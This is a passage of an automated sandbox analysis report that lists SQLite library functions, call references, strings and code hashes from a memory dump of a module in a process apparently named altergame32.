                                                                    • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                                  • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                                  • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                                  • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                                  • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                                  • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                                    • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                    • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                    • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                    • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Similarity
                                                                  • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                                  • String ID:
                                                                  • API String ID: 683514883-0
                                                                  APIs
                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                                  • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                                  • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                                  • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                                    • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                    • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                    • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                    • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                    • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Similarity
                                                                  • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                                  • String ID:
                                                                  • API String ID: 1903298374-0
                                                                  APIs
                                                                    • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                  • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                  • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                  • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Similarity
                                                                  • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                  • String ID:
                                                                  • API String ID: 1894464702-0
                                                                  APIs
                                                                    • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                                  • sqlite3_log.SQLITE3 ref: 609253E2
                                                                  • sqlite3_log.SQLITE3 ref: 60925406
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Similarity
                                                                  • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                  • String ID:
                                                                  • API String ID: 3336957480-0
                                                                  APIs
                                                                  • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                                  • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                                  • sqlite3_data_count.SQLITE3 ref: 60961465
                                                                  • sqlite3_column_value.SQLITE3 ref: 60961476
                                                                  • sqlite3_result_value.SQLITE3 ref: 60961482
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Similarity
                                                                  • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                                  • String ID:
                                                                  • API String ID: 3091402450-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Similarity
                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                  • String ID:
                                                                  • API String ID: 251237202-0
                                                                  APIs
                                                                  • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                                  • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                                  • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                                  • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                                  • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Similarity
                                                                  • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                  • String ID:
                                                                  • API String ID: 4225432645-0
                                                                  • Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                  • Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
                                                                  • Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                  • Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: sqlite3_log
                                                                  • String ID: ($string or blob too big$|
                                                                  • API String ID: 632333372-2398534278
                                                                  • Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                  • Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
                                                                  • Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                  • Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Virtual$Protect$Query
                                                                  • String ID: @
                                                                  • API String ID: 3618607426-2766056989
                                                                  • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                  • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                                  • Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                  • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                                  APIs
                                                                  • sqlite3_malloc.SQLITE3 ref: 60928353
                                                                    • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                  • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                                  • sqlite3_free.SQLITE3 ref: 609283B6
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                  • String ID: d
                                                                  • API String ID: 211589378-2564639436
                                                                  • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                  • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                                  • Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                  • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                  • API String ID: 1646373207-2713375476
                                                                  • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                  • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                                  • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                  • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                  • String ID:
                                                                  • API String ID: 1648232842-0
                                                                  • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                  • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                                  • Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                  • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                                  APIs
                                                                  • sqlite3_step.SQLITE3 ref: 609614AB
                                                                  • sqlite3_reset.SQLITE3 ref: 609614BF
                                                                    • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                    • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                  • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                                  Similarity
                                                                  • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                                  • String ID:
                                                                  • API String ID: 3429445273-0
                                                                  • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                  • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                                  • Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                  • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                                  APIs
                                                                  • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                                  • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                                  • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                                  • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                                  Similarity
                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                  • String ID:
                                                                  • API String ID: 1477753154-0
                                                                  • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                  • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                                  • Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                  • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                                  APIs
                                                                  • sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                    • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                  • sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                  Similarity
                                                                  • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                                  • String ID:
                                                                  • API String ID: 2673540737-0
                                                                  • Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                  • Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
                                                                  • Opcode Fuzzy Hash: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                  • Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                  • String ID:
                                                                  • API String ID: 3526213481-0
                                                                  • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                  • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                                  • Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                  • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                                  APIs
                                                                  • sqlite3_prepare.SQLITE3 ref: 60969166
                                                                  • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                                    • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                                  • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                                    • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                                  • sqlite3_step.SQLITE3 ref: 60969197
                                                                  Similarity
                                                                  • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                                  • String ID:
                                                                  • API String ID: 2877408194-0
                                                                  • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                  • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                                  • Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                  • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                                  APIs
                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                                  Similarity
                                                                  • API ID: sqlite3_mutex_enter, sqlite3_mutex_leave
                                                                  • String ID:
                                                                  • API String ID: 1477753154-0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_log
                                                                  • String ID: into$out of
                                                                  • API String ID: 632333372-1114767565
                                                                  APIs
                                                                    • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                                  • sqlite3_free.SQLITE3 ref: 609193A3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_free, sqlite3_value_text
                                                                  • String ID: (NULL)$NULL
                                                                  • API String ID: 2175239460-873412390
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_log
                                                                  • String ID: string or blob too big$|
                                                                  • API String ID: 632333372-330586046
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_log
                                                                  • String ID: -- $d
                                                                  • API String ID: 632333372-777087308
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_log, sqlite3_value_text
                                                                  • String ID: string or blob too big
                                                                  • API String ID: 2320820228-2803948771
                                                                  APIs
                                                                  • sqlite3_aggregate_context.SQLITE3 ref: 60914096
                                                                  • sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_aggregate_context, sqlite3_value_numeric_type
                                                                  • String ID:
                                                                  • API String ID: 3265351223-3916222277
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_stricmp
                                                                  • String ID: log
                                                                  • API String ID: 912767213-2403297477
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_strnicmp
                                                                  • String ID: SQLITE_
                                                                  • API String ID: 1961171630-787686576
                                                                  APIs
                                                                  • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                                  • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                                  Strings
                                                                  • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_value_blob, sqlite3_value_bytes
                                                                  • String ID: Invalid argument to rtreedepth()
                                                                  • API String ID: 1063208240-2843521569
                                                                  APIs
                                                                  • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                                    • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                    • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                    • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                    • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                  • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_soft_heap_limit64$, sqlite3_initialize, sqlite3_memory_used, sqlite3_mutex_enter, sqlite3_mutex_leave
                                                                  • String ID: soft_heap_limit
                                                                  • API String ID: 1251656441-405162809
                                                                  APIs
                                                                  • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                                  • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_log
                                                                  • String ID: NULL
                                                                  • API String ID: 632333372-324932091
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
                                                                  • TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                  • String ID:
                                                                  • API String ID: 682475483-0